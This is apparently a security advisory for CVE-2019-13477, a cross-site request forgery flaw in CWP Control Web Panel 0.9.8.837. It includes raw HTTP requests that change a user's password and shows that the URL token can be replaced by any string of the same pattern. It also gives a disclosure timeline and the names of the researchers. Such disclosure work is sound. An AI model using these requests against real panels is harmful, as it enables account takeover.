Cross-Site Request Forgery (CSRF) # ==================================================================== # Information # ==================================================================== Product : CWP Control Web Panel version : 0.9.8.837 Fixed on : 0.9.8.851 Test on : CentOS 7.6.1810 (Core) Reference : https://control-webpanel.com/ CVE-Number : 2019-13477 Original request POST /cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1 Host: 192.168.75.148:2087 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 50 Connection: close Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true accion=changePass&pass=UEBzc3cwcmQ=&username=user1 Even the url has token value,but the token only check for pattern "cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" modify the end of the token value POST /cwp_99999999999999999999999999999999/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1 Host: 192.168.75.148:2087 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 50 Connection: close Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true accion=changePass&pass=UEBzc3cwcmQ=&username=user1 # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13477.md # ==================================================================== # Timeline # ==================================================================== 2019-06-05: Discovered the bug 2019-06-05: Reported to vendor 2019-06-05: Vender accepted the vulnerability 2019-07-17: The vulnerability has been fixed 2019-08-20: published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak